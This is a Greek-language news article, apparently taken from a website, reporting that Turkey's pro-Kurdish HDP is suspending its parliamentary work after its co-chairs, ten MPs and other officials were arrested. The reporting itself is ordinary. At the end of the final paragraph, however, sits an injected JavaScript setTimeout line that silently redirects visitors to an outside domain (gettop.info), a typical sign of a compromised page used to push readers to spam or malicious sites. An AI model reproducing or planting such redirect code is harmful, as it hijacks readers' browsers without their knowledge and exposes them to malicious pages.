Το φιλοκουρδικό HDP αναστέλλει τη συμμετοχή του στο τουρκικό κοινοβούλιο

0
6

 

Πέρυσι στις εκλογές το HDP έγραψε ιστορία κερδίζοντας 10% και καταφέροντας την είσοδο στη Βουλή, ενώ αρνείται σχέσεις με το ΡΚΚ. Ωστόσο, έπειτα από τη λαμπερή κοινοβουλευτική του πορεία, η σύλληψη της ηγεσίας του, βουλευών και μελών του οδήγησε το φιλοκουρδικό Κόμμα της Δημοκρατίας των Λαών στην απόφαση να «αναστείλει τις νομοθετικές του προσπάθειες».

«Έπειτα από συζητήσεις με την κοινοβουλευτική μας ομάδα και την κεντρική επιτροπή, αποφασίσαμε να αναστείλουμε τις νομοθετικές μας προσπάθειες μετά από όλα όσα έχουν συμβεί», ανέφερε ο Αϊχάν Μπιλγκέν εκπρόσωπος του HDP στην ανακοίνωση που διάβασε μπροστά από τα γραφεία του κόμματος στο Ντιγιάρμπακιρ.

Ο Μπιλγκέν εξήγησε μιλώντας στο Reuters ότι το HDP δεν θα αποχωρήσει από το Κοινοβούλιο και ότι οι βουλευτές του δεν θα παραιτηθούν, όμως δεν θα συμμετέχουν στις συνεδριάσεις και τις κοινοβουλευτικές επιτροπές.

Μετά τη σύλληψη των συμπροέδρων του HDP, Σελαχατίν Ντεμιρτάς και Φιγκέν Γιουκσεκντάγκ, ακολούθησε η σύλληψη δέκα βουλευτών του κόμματος στο πλαίσιο των ερευνών που διεξάγουν οι τουρκικές Αρχές για την τρομοκρατία.

Χθες συνελήφθησαν ακόμη εννέα αξιωματούχοι του κόμματος.

Αξιωματούχοι του HDP θα συνομιλήσουν με υποστηρικτές του κόμματος, πολλοί από τους οποίους ζουν στη νοτιοανατολική Τουρκία όπου η πλειονότητα των κατοίκων είναι Κούρδοι, και στη συνέχεια θα εξετάσουν το ενδεχόμενο μιας πλήρους αποχώρησης από το κοινοβούλιο, υπογράμμισε ο Μπιλγκέν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here